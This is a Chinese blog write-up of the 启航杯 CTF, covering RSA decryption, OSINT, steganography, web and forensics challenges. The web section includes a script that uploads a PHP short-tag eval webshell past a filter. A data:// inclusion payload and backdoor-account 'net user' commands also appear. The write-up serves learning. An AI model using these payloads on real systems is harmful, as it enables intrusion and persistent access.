启航杯WP | Lwwww's Blog

这次启航杯跟Demon师傅组队，Demon师傅很牛做出两个misc但是web的发力期被我截断了不然肯定嘎嘎做，但是必须批评Demon找来的两个队友水的一逼而且态度真是无语，早早组好的局竟然有个人没报名，然后一整天都在当捧哏，一个ez的伪协议绕过就直接把他卡死一早上。下午我让他去写WP payload和思路都给了结果晚上了给我说：”写不出来~“另一个选手也是极品，报名了但是好像没参与，给一号选手用账号去了。最后定榜55名，我以为是没奖但是好像是前70给奖，但是无所谓了，题的质量很一般。可惜misc还是做少了经验太少不然感觉除了第二个osint以外其他的应该是能ak的，

取证也是奇奇怪怪的FTK配了半天挂载到本地结果还是不好使一直权限不够权限不够的，不然感觉还能多做点取证题。

幸亏有Demon师傅帮我分担写wp的重担，而且还给我投喂奶茶和点心真是破费了。

Crypto

Easy_RSA

题目是开启容器给题，基本上就是动态flag

$$
private_key = b’—–BEGIN RSA PRIVATE KEY—–\nMIICWwIBAAKBgQDaRITFDVDfEl8XwGzeiYnK+ZL9tB16amRkn+1je4M7lONcmQEV\nL673B9YpCZ1HVtD87G7xiHmc/wrgi8bzEVQ06YRLXThg6IoTbT6LUZPYZn8SevBN\npc46oD8VPfMmplc0DXqg/HJaQYj4HhSTjontsO2ohGExUndlcpQrcDwQBQIDAQAB\nAoGANF40LMMhICRcRGqatFnzgYuXxN8uI2zbYXktj6zWs7jpRBJBvD+QjxyGOZpg\n7fjac5SWmcTQyOY4Sd+/gBosRYRA11O+ssWUvYva1pxAW36QYn6BApuuFOJV4iZN\n7z5lyHdQU9AKW+qfCw5mYBqDu/gQ6aIKIqXcc4yzOuVWfZECQQDpO7X+cDDRUKMS\nsrT5BUCgLKeZ+EvcItAMFDPctYWx3M4TWs7rx/4mKRLUb4M+kAeMjNRr/uHP1WbO\nethUI/0HAkEA75LUucqfHxy70m6fM4TDbMd9+l/9rHur9LNOVATyOTtP8o6cEmNw\n7jIm1+qCdY4UUV04E6JAJCdHfs2XvZPTkwJAARmD+SgkQshjjHIFQmtQ67BqNeKi\n0O3lFzl9KRw9/iGxYwv5j8kInLty2EeSUdgyAOqlEcFI5Ub3Th/sJzFoPwJAWcBA\nQXpPMnCpTKR0r/BE5jO2Vl4vwrZyLTIfXgqcVCSMRup2Pc1TOWlAdBM+3JtlsTWj\nFHfsX573geGzvynqUQJAGVEl858Q0cjbagyTh5ByLxn+dR+Zsixjw7xBX1isJW2+\n2iiEUVsixyYY3/Yk7/m+B/FF5iTV5G7pNK1oQ35fAA==\n—–END RSA PRIVATE KEY—–’
public_key = b’—–BEGIN PUBLIC KEY—–\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDaRITFDVDfEl8XwGzeiYnK+ZL9\ntB16amRkn+1je4M7lONcmQEVL673B9YpCZ1HVtD87G7xiHmc/wrgi8bzEVQ06YRL\nXThg6IoTbT6LUZPYZn8SevBNpc46oD8VPfMmplc0DXqg/HJaQYj4HhSTjontsO2o\nhGExUndlcpQrcDwQBQIDAQAB\n—–END PUBLIC KEY—–’
enmessage:WjCP8Htx9flF7S28xJz/eiwjOJr5QwJ9ZUTLL3PqujMsAWonjLeMLfcHprEY/lcyXOR3CShyE0HqQjEFnRrI0+cnwtFkY3OG341g6mEuwqG364vKmq95FPEi76y9ICdfuagTdAuzhzvISXkgATQ2V31nvgeln1+vuAq0hez9qEM=
private_key = b’—–BEGIN RSA PRIVATE KEY—–\nMIICXAIBAAKBgQDSkyfKFrEABN38FH5ZWwclPY+7z3I5qp8ckUcp0MDM9AEw9C4U\n2TpQ6kX7o1DhxaX+lXZsvkY30VTjeFLagQLwyEvEaXkLrCkA6Vt+LRZrGh/eoji2\nmwZgZQAP5mcNN+zd8UfJ477WiSnyFAhP9xo4Yk/ulBiiXbDzxJ6uENavhwIDAQAB\nAoGAIlmyBHPrf3V2dtrVpPhF8/ZqaONAHsBtaz4XDe8JUdsTX1Z94UBxvxBbG9+6\nNSebr/+BYt+D2d19NmGC9opUHaz0ngSTSAbLhJRKLfl/i2aI1I6A/Gj88zi8s6yF\nsQr8jgLZMg1xYDtjXRRcMRB16fPXecikJBfUuhHocWEtyokCQQDY6o31ZF8mM2rl\nz1QrOHs5oIAXGgWsrrPQS9dlFsp3b5xo4l7vwgZfl8bSCujfnM4v/KJfJt/TJu9E\nWlTv8mupAkEA+IQZKsutRpb+zRKd+/jKZV3xXuo+eJGT8rydp5L1xy0Aen+qKZyd\naTl2dUFUo04/bmxGKmsD/VPPjskpDOy/rwJBAI+7jGlIIwxLEdBJe3pQKMbcpUOp\niI0ODjQ9rPJdEbfmivus1D+Gj3aUObhAZmKVosKFYoouVi2yJOVj/dgpCFECQF2o\nkz+QsUYIRBEPciDzO3wGcqAd0dtoqgRyV0w/U4d0C1kfYgb6skxkzqMUMwy0wa0g\n+zSjTkab3n5mi6UGWJsCQApqGz86U709A3G9gF34G75ePLQVwOI/9RjtzxuIY3Rn\nBS5ACOsQb/kW1wal2MhCOdWKgDrl0KZpzg855Sh4Rd0=\n—–END RSA PRIVATE KEY—–’
public_key = b’—–BEGIN PUBLIC KEY—–\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDSkyfKFrEABN38FH5ZWwclPY+7\nz3I5qp8ckUcp0MDM9AEw9C4U2TpQ6kX7o1DhxaX+lXZsvkY30VTjeFLagQLwyEvE\naXkLrCkA6Vt+LRZrGh/eoji2mwZgZQAP5mcNN+zd8UfJ477WiSnyFAhP9xo4Yk/u\nlBiiXbDzxJ6uENavhwIDAQAB\n—–END PUBLIC KEY—–’
enmessage:OVafA/n9ovZx9rd+mM2lz41u4Ga1xaYJssXApL0hfKwBWTA/XAC+OX4hVk3UWPZbs/68oN/C5LmzwEfyBC0N10cOIuJq78eTvMLaj6tc72PPAbt+0YUBSbIMt6m7/kzty/l5nbZxVt4TCPyH8Zqr4NzriqQhNwjUhrhTGT7wJBs=
$$
其实我是不太会密码的然后附件给了一个py的模板

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes
import base64

# 加载私钥

private_key_pem = b"""
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQC8NruXkH2ORXb249GMv+8Y3tPd8nu5OOMPUV5L16KELi9AVxoY
Y1v7aEnMXNkUEQ1yeLjyxQrPV3QmQA9jaTLdLf/QgyxGPDlVjjb1g9uxxLr5N0a4
SLZ9uaQ5EkswTFtvQyHzbC21eowxvVNapHMfEEp5YuThrgQynxuQCcHtswIDAQAB
AoGAFUNKV8SV5/lBXSypSJvfBfHCgLFQuJZMfIyw46OQSMYzm11butlFaSEZLpJn
XxolaUMUgy9Z2ckOUPXtZx8u2iv2t1UzJeh3cCbhGok4+Ja69JWoRQeslTk2W2Tx
TYuUuspQYYrna+cUNsd4MRKMoa+bDosjRy3rqlnvPb5utC0CQQDSvDxlWjvI+pFf
4fylByLBSlfDDDR80tXoMWj28t43JH+mviyl8rkX7zppH4BVe9IL+0nv+myWuJ8O
IcQ4SZKHAkEA5KQZxRGMd1Ax1HhFqOPzqMFcszzzp2mpOEbZyhmrCRAa5MUmPIko
rwYJvYwUWT7a3AZcl/Koi7bqhfFOo43adQJAS76k5rkcLA0EG7aanKaH83nJOa41
X3hYsnCwDbMV9DQGPeS1H6Cyrsup7wcHlbI/uVbFKKCWT0ZkxSuV37VyGQJBANB2
UkycgG60fopTEmg3VgwyKHv/gcPNEY2PA7lBh/DebzbQDdm50I8ruSvKES+BoHhl
kHy1sTiZkOCIsANtLZUCQQCk1BgGGG+sKRHS2/xu3lT3C2Ihn1hrnNLMQ5QlC0JJ
/FSHxvVpzB8o94PNq6X+KrK6p82WYfkLKl+A5YPhoh/Q
-----END RSA PRIVATE KEY-----
"""

# 加载私钥

private_key = serialization.load_pem_private_key(private_key_pem, password=None)

# 加密的消息

enmessage = b"PfifIriIHAwst7UxsHPNj3CGwlnNWbB5iVVq9O6oEsinLxxJgHcTmBHFGxWA5FC87aHKARXCzwH+v4H1ES/lMSnkVuVfrQdReR62GYIWUYuB2Gb6LnEJ0n4x9sXBA5FrSH9wlu14WT4S+ko+90kCS2jgGC7R2vKRe2QfFFwZ1R8="

# 解密消息

encrypted_message = base64.b64decode(enmessage)
try:
    decrypted_message = private_key.decrypt(
        encrypted_message,
        padding.PKCS1v15(),

        # 使用适当的哈希算法

        algorithm=hashes.SHA256()
    )
    print(decrypted_message.decode())
except Exception as e:
    print(f"Decryption failed: {e}")

然后去找ai，一开始是直接扔给他是不行的，但是多调教几次就好

payload：

# -*- coding: utf-8 -*-
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64

# 加载私钥
private_key = b'''-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQDEfgk6+MERVwmKx6b4w4HM+cKlP34Lz7qMICOnDK906zIQyA2a
7YTba8vssM4jpf+RLda0ZtAWnLj+sVgsBQAaWQ8quUt2FJCFEglpCBbvvsdfBD/A
Wc6w58ekPUWvcMu+Q68EVUre1lSXl8Lt2U0ObB77l577nYAdr7rf7HJMlwIDAQAB
AoGAAaKQLm7GIdV46DAOckt417J3AtZVv4C/AKN+fclb5xEonX3MqdldcvtL+xri
3Du+tf/iUCX63UqjOhtSVytuJhuQ2QIUUrkNEPkNBye5aIPN6j4buZXHzyfyVxqy
6zddT0HTGzIOEn9VIIHMydrrdvEYEd2ZrwlRQApTNAQztGECQQDOllqpJ/R/Kgb3
8QuJvhN1jDco9DYb9c2+XZL3u5aFZpJ2C86gus2NrK8096V7LOt02Vc0n4gBuXYv
9BMbo997AkEA832M97qZ+aVi0c0okDv0wORxtDDE/zoXOjzSMS+xMoC7i27Hn/Az
DL6EHfYBxqj247Tq9QxMBMumclyL/+GOlQJALfwR2i1moxe7zVz+cH663iOD873I
fZjNX1585GABNViLqXMfX2+1aZ/SsDufvjdVggEPBEuufpPF1w7BYhmsGQJABGJS
U3OMqi4MJXLoNBCgS4jRc0kdgurs2COYNUKCkkI3Hj+UYJDWmngjsNZpGcaZC2iK
gncCN2PjT1PTQXwyMQJBAJItDvEaRC8BzlC10h31KC6gmmwU8IsqBYe4B6+btvIT
UXZ23kO/okQTy65x4MmP5g1XLJAj29jVeZAUW+/B2uo=
-----END RSA PRIVATE KEY-----'''

# 加密后的消息
encrypted_message = b'''EfXlCYvGHy4Haw0cl9dW5ufxMoB9rgturZOVoKokBg/fHOPDpiYY+jeABxMKAgjr
Cbtync9Gx0l0dfYSs06KTKVfR5L4oZbwolWx19bCVWzlQ9f91x1Z8U/uE9fG0xna
/wUTvrExm8QdKC1OxmSFvPNrffrkEDzEVWP3lTPZ3wQ='''

def decrypt_message(encrypted_message, private_key):
    # 导入私钥
    key = RSA.import_key(private_key)
    # 使用PKCS1_OAEP解密
    cipher = PKCS1_OAEP.new(key)
    # 解码Base64格式的加密消息
    decrypted_message = cipher.decrypt(base64.b64decode(encrypted_message))
    return decrypted_message.decode()

# 解密消息
decrypted_message = decrypt_message(encrypted_message, private_key)

# 输出解密后的消息
print("解密后的消息:")
print(decrypted_message)

QHCTF{c0cd580e-2859-469c-b58e-cec1abe77e6d}

MISC

请找出拍摄地所在位置-OSINT

这个题很恶心，我认为

说一下我做这个题目的思路，首先就是对着图片本身去找一下主要就是看exif，但是一般这种网络迷踪肯定是不会给的，所以没有收获很正常，然后我就把目光放到那种精准定位的地方了，我想看左侧蓝色大巴后面小车棚的电话，直接去问问（哈哈真这么想的但是可惜很糊辨认不清楚）然后这些周围的商家店铺太杂乱了，地图上是很难找到的，但是我还是找了想碰碰运气。

接下来的解题思路是锁定右上角的广告，柳城鸿鑫4s店，直接锁死柳州市，然后对着商家店铺输出，最后最容易找到的是绿源电动车上面的那个共享科技美学馆，直接就能锁定这个路口

但是flag死活交不对，一开始我以为是我找错了

小明在接亲戚回家过年时随手拍了一张照片，之后他在网上发起了一个挑战：找到照片中的地点并排名前三的人，将获得额外奖励。现在，挑战就在你面前，你准备好接受了吗？
提交方式：QHCTF{xx省/自治区xx市xx县/市/区xx路与xx路交叉口}

看到这个提交格式你不懵逼吗？

最后过了一个多小时我实在做不出来的时候反应过来要不然试试没有/

直接成功，真是无语以后建议给格式就标准一些，别老误导我们CTFer

QHCTF{广西壮族自治区柳州市柳城县六广路与榕泉路交叉口}

OSINT-你猜猜这是哪？

这道题当时没出，后来在群里问出题人解题思路，出题人说第一个osint是静心拍摄的，第二个osint纯纯随手拍

但是我没想到这题最后20多解，估计是被py烂了，群里的大哥说去大众点评找酒店，不能找后面的银行，银行太多了，酒店反而好找

我是没话说了，能找到感觉也是狗运，我是没狗运了

你能看懂这串未知的文字吗

这题当时也没出，很早就找到羊文了但是扔到随波逐流梭哈没有成功我就很懵逼

在贴吧找到羊文对照表

翻译之后是

1
2
3

szfpguw
izgwesq
zoaoerh

但是放到随波逐流里面梭哈没出来，赛后大师傅在群里说是维吉尼亚

lsb隐写

b1,rgb,lsb,xy .. text: “qihangbeiiseasy”

然后在用随波逐流维吉尼亚解密就完美解出

cryptoveryeasybysheeb

包上{}和flag就行

PvzHE

这个是植物大战僵尸的那个pvz是Demon做的，进去直接找到images

有一个图片直接就是flag

猿类的编程语言你了解吗

用jphs这个工具，但是以前没接触过图片还有这个方向的东西，后来在我的不知道哪个老学长祖传下来的工具包里面就搜到了

但是要密码我不知道在哪，等着官方wp下来之后在看看吧，(根本没秘密我真服了，但是我鼠标点击就报错，回车就行了)导出这个hide之后是ook解密这题比较misc有点好玩

.. .. .. .. .. .. .. .. .. .. !? .? .. .? .. .. .. .? .. .. .. .. .. .. .. .? .. .. .. .. .. .. .. .. .. .. ?. ?. ?. ?. !! ?! .? .? .? .. .. .. .. .. .. .. .. .. .. .. !. !! !! !! !! !! !! !! !! !! !. !! !! !! !! !! !. .? !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !. ?. .. .. .. !. .? .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. !. ?. ?. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. !. .? .? !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !. ?. ?. .. .. .. !. !. .? .? !. ?. ?. !! !! !! !! !! !. .? .? .. !. ?. ?. .. .. .. .. !. !! !! !! !! !! !! !! !. .? .? !! !! !! !! !. ?. ?. .. .. .. .. .. .. .. .. !. .? .? !. ?. ?. .. .. .. .. !. !! !! !! !! !! !! !! !! !! !! !! !! !. .. .. .. .. .. .. .. !. !! !! !! !! !. .? .? .. .. .. .. !. !! !! !! !! !. ?. ?. !! !! !! !. .. .. .. .. .. .. .. .. .. .. .. !. !! !! !! !! !! !! !! !! !. .? .? .. .. .. .. .. !. ?. ?. .. .. .. .. !. !! !! !! !! !! !! !! !. .? .? !! !! !! !! !. .. !. ?. ?. .. .. .. .. .. .. !. .. .. .. !. !! !! !! !! !! !! !. .. .. .. !. .? .? !! !! !. ?. ?. !! !! !! !. .? .? .. .. .. .. !. !! !! !! !! !. ?. ?. .. .. .. !. .. .. .. .. .. .. !. .? .? .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. !.

ook解密https://www.splitbrain.org/services/ook直接梭哈了

______启动！

这题是Demon解出的

找到这个流量包，

tcp追踪流

但是Demon是找的ai直接就吐出来了具体解法没给出

QHCTF For Year 2025

这个题也是Demon出的根据hint对着日历一个个画出来就能拼出来，不知道为什么这么简单的思路qit那边竟然没人做出来

什么时候qit能来个大爹帮我分担一下压力啊

1 2	hint: 080714212829302316092230-04111825121306132027-0605041118252627-08091009162330-0102031516170108152229-0108142229-0203041617180209162330-0108152229303124171003-231609021725181104-01020917233029

最后拼出来是QHCTF{FUN}这个题没啥意思

WEB

PCREMagic

学弟做出来之后给我说是php短标签绕过，然后他写了脚本给我

源码：

 <?php
function is_php($data){
     return preg_match('/<\?php.*?eval.*?\(.*?\).*?\?>/is', $data);
}

if(empty($_FILES)) {
    die(show_source(__FILE__));
}

$user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) {
    echo "bad request";
} else {
    if (!is_dir($user_dir)) {
        mkdir($user_dir, 0755, true);
    }
    $path = $user_dir . '/' . random_int(0, 10) . '.php';
    move_uploaded_file($_FILES['file']['tmp_name'], $path);

    header("Location: $path", true, 303);
    exit;
}
?> 1

学弟做出来之后给我说是php短标签绕过，然后他写了脚本给我

import requests
url = 'http://challenge.qihangcup.cn:33842/'
file = {'file': ('1.php', '<?=eval($_POST[1]);?>', 'images/png')}
res = requests.post(url, files=file, allow_redirects=False)
print(f"路径: {url}{res.headers['Location']} ,木马为：1")

用蚁剑连接,在根目录下找到flag

那么这道题对我来说肯定不是这样就得过且过了

开始复盘：

 <?php
function is_php($data){
     return preg_match('/<\?php.*?eval.*?\(.*?\).*?\?>/is', $data);
}
//这里是一个函数，data传参里面不允许有“/<\?php.*?eval.*?\(.*?\).*?\?>//”is这些东西，把<?php ?>标签ban了

if(empty($_FILES)) {
    die(show_source(__FILE__));
}

//这段代码的意思是如果$_FILES为空（即没有上传的文件），则执行die(show_source(__FILE__))，这会终止程序执行并输出当前文件的源代码。就是说让你传文件呢！


$user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) {
    echo "bad request";
} else {
    if (!is_dir($user_dir)) {
        mkdir($user_dir, 0755, true);
    }
    $path = $user_dir . '/' . random_int(0, 10) . '.php';
    move_uploaded_file($_FILES['file']['tmp_name'], $path);

    header("Location: $path", true, 303);
    exit;
}
?>

因为把很多东西都ban了让传文件又不能用，那就用php短标签去写一个小马

php短标签

1
2
3

<?php ?>是正和常情况下的标签，用于识别这是个php文件，但php也允许使用短标签<? ?>和<?=  >，可以用于php被过滤的情况下。 <? ?>等价于<?php ?> <?= >等价于<?php echo ?>
举个例子：
<?='Hello World'?>    // 输出 "Hello World"

细细品味一下学弟的payload

import requests
url = 'http://challenge.qihangcup.cn:33842/'
file = {'file': ('1.php', '<?=eval($_POST[1]);?>', 'images/png')}/*建了一个字典，键为 “file”，值是一个元组。元组中第一个元素是字符串 '1.php'，代表一个文件名；第二个元素是字符串也就是文件内容，images/png应该是定义成png格式方便绕过吧'*/
res = requests.post(url, files=file, allow_redirects=False)//剩下的就是post传参了
print(f"路径: {url}{res.headers['Location']} ,木马为：1")//回显蚁剑的连接路径

Easy_include

源码：

<?php 
error_reporting(0); 
//flag in flag.php 
$file=$_GET['file']; 
if(isset($file)) 
{ 
    if(!preg_match("/flag/i",$file)) 
    { 
        include($file); 
    } 
    else 
    { 
        echo("no no no ~ "); 
    } 
} 
else 
{ 
    highlight_file(__FILE__); 
} 

?>

一个简单的文件包含，用data伪协议读取

?file=data://text/plain,

Web_IP

Forensic

早上起来启航杯平台关了，等着后续平台重启我再去补上Forensic的复现

中午就开放了服了，本来还想歇会，但是我还是拖了两天哈哈根本不想学习。

给出附件（10G）通过网盘分享的文件：启航杯取证.7z
链接: https://pan.baidu.com/s/1xZ3bY58Td-OQ6CqyrVpNAw?pwd=23ch 提取码: 23ch

解压密码是90382728-ca22-48e7-8413-61f6438f1b90

关于取证这个题给的是e01文件我只会用ftk进行挂载肯定还有别的方式但是好像要收费

然后由于我把这些乱七八糟的东西基本上都放到D盘里面然后D盘权限只给了可读和可写没有给完全控制导致我一直挂载好也进去不

今天捣鼓的时候突然想着看一眼D盘权限果然解决那就继续看看取证

首先就是FTK挂载，FTK其实就是镜像虚拟仿真用的，FTK挂载到本地你本地就会出现挂载起来的磁盘，在此电脑中就能直接看到然后其实就能够正常访问了应该是这样

这个时候可以去虚拟机里面搞去仿真，也可以直接本地做题，在这次取证好像win6很难出解，出题人说是因为win6会被杀毒软件杀掉

Win_01

某天，小明正在某网站进行学习。突然，一位蛤客盯上了他，并向他发送了一封钓鱼邮件。由于小明刚接触网络安全，对钓鱼邮件并不熟悉，他不小心下载并点击了邮件中的附件。当他后来学习到钓鱼邮件的相关知识时，已经为时晚矣。于是，他请求你帮助找出蛤客的痕迹。请你针对附件镜像进行一次应急响应，查找以下flag值。压缩包附件的解压密码为：90382728-ca22-48e7-8413-61f6438f1b90。请以QHCTF{xxxxxxxx}的格式提交结果。

1.找出系统中蛤客的ip地址及端口，提交方式请以QHCTF{md5(127.0.0.1:80)}进行提交，例如：QHCTF{cef54f47984626c9efbf070c50bfad1b}

Win_02

蛤客在控制小明的系统后，创建了一个最高权限的后门账户，请你找出该账户的用户名及密码，提交方式请以QHCTF{md5(user_password)}进行提交，例如：QHCTF{cef54f47984626c9efbf070c50bfad1b}

这个控制系统后的操作看C3师傅的笔记能知道一般都是在powershell的记录里面G:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

也就是这个路径下有一个文件

net user HackY$ 123456 /add
net user HackY$ /de;
net user HackY$ /del
net user HackY$ 123456 /add
net user HackY$ /del

Win_04

4.蛤客在系统数据库中藏了一些东西，请你找出其中的flag值
提交方式：QHCTF{xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx}

这个题是在注册表里面找到的flag

Win_05

5.小明在找你帮忙之前，喊了他的一位好友帮他先行取证，请你找出他好友远程所使用的软件，并找出控制了多少秒，ip是什么，提交方式请以QHCTF{md5(xxxx_10_127.0.0.1)}进行提交，例如：QHCTF{cef54f47984626c9efbf070c50bfad1b}

Win_06

6.请你找出蛤客在启动项中藏的flag
提交方式：QHCTF{xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx}

Win_07

蛤客在home目录中存放了一个恶意程序，请你分析该程序，并找到其中的flag值
提交方式：QHCTF{xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx}